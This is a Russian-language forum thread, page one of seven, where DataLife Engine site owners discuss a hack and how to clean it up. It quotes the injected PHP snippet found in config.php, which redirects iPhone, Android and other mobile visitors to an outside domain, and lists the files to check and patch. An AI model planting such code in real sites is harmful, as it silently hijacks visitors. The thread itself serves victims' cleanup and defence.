Взлом dle проверяем файлы.
Страницы: 1 2 3 4 5 ... 7 След.
Взлом dle проверяем файлы., Вирус редирект в dle
Недавно ковырялся в бекапе сайта, случайно как-то увидел изменения config.php, и обнаружил там такой вот кодик:

Код
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
}
Сейчас буду чистить весь сайт, проверять на вирусню: пока что такую фигня обраружил в  /engine/data/config.php, /engine/init.php, index.php .Короче смотрите те файлы которые недавно были изменены, у меня вирус появился как смотрю по дате 9 января.

Или переустановить двиг?!smile:confused:
Цитата
Леон пишет:
Или переустановить двиг?!smile:confused:
Меняйте, потом отпишитесь, получилось или нет;)
А на крайний случай - нужно иметь свежие бэкапы).
Качественный рерайт/копирайт/перевод | Создание сайтов за еду! Дёшево!
Пока просто почистил, посмотрим что будет дальше. Двиг пока не охота переустанавливать слишком много модулей установлено.
Такая фигня не тока у меня:http://forum.searchengines.ru/showthread.php?s=cbc38d89875a6622c732af2d15892948&p=11292076
вот блин тоже нашел эту дрянь на 3 сайтах, кто знает откуда корни растут?
У меня тоже ((smile:mad:
Я пофиксил! сначало снес весь код левый и с офы пач поставил!
init.php
index.php
dbconfig.php
config.php 

В этих файлах сносите левый код!
Сейчас найду ссылочку фикса и скину!
dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html]Вот скачайте перезалейте файл!

Вроде проверили этот файл... дописали много чего!
Дополнительно поменяйте все пароли от баз данных и тд!  проверьте даты изменения файлов примерно тогда когда у вас изменились эти файлы и также сносите код!smile:p  Удачи вам! если поможет отпишитесь!
Думая что большинство из зараженных двигов - nulled, отсюда и проблема, но могу ошибаться... Рекомендую еще заглянуть в корневой .htaccess, там тоже бывает много чего интересного!
Такая же фигня.... smile:mad: руки оторвать...
Может кому будет полезно! Заметила что среди сайтов на DLE на одном же сервере есть зараженные и нет. Нашла чем они у меня отличаются (версии Dle разные) не заражены были сайты где файл admin.php, были переименованы.
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Кучка жалких школьников плакает, вай какая беда:)
Изменено: цтуе wnet - 15 Января 2013 08:12
Цитата
цтуе wnet пишет:
Кучка жалких школьников плакает, вай какая беда:)
*смотрит как на идиота*smile:confused:
Страницы: 1 2 3 4 5 ... 7 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
20:34 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
18:58 Как грамотно и эффективно монетизировать форум? 
17:13 Как правильно покупать ссылки для поддомена? 
17:10 Стоит ли добавлять сайт в Rambler топ 100? 
17:10 МТС разуверилась в своём заменителе YouTube 
14:22 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
13:55 Ищу специалистов 
18:08 Прием платежей для HIGH RISK | Прием платежей без сайта 
18:05 Услуги рассылки Viber|Whatsapp|IMO. 
18:03 Рассылка в TELEGRAM |Большой опыт работы | Любые тематики | Лучшая конверсия 
15:52 JustProxy.Biz - Резидентные прокси без ограничения по трафику 
13:15 TETChange-Обменник криптовалют 
05:46 Комплексный прогон по трастовым сайтам, статейное размещение. Рост НЧ-СЧ, Тиц-пр. 
04:15 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
18:52 150+ хакерских поисковых систем и инструментов 
17:16 Китайский ИИ-ассистент DeepSeek начали запрещать в некоторых странах 
21:48 Точные прогнозы на футбол 
14:43 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 
22:39 С юмором по жизни! 
22:21 Telegram не смог провести различие между требованиями автократических режимов и законными демократическими запросами 
22:19 Подтягиваем физкультурку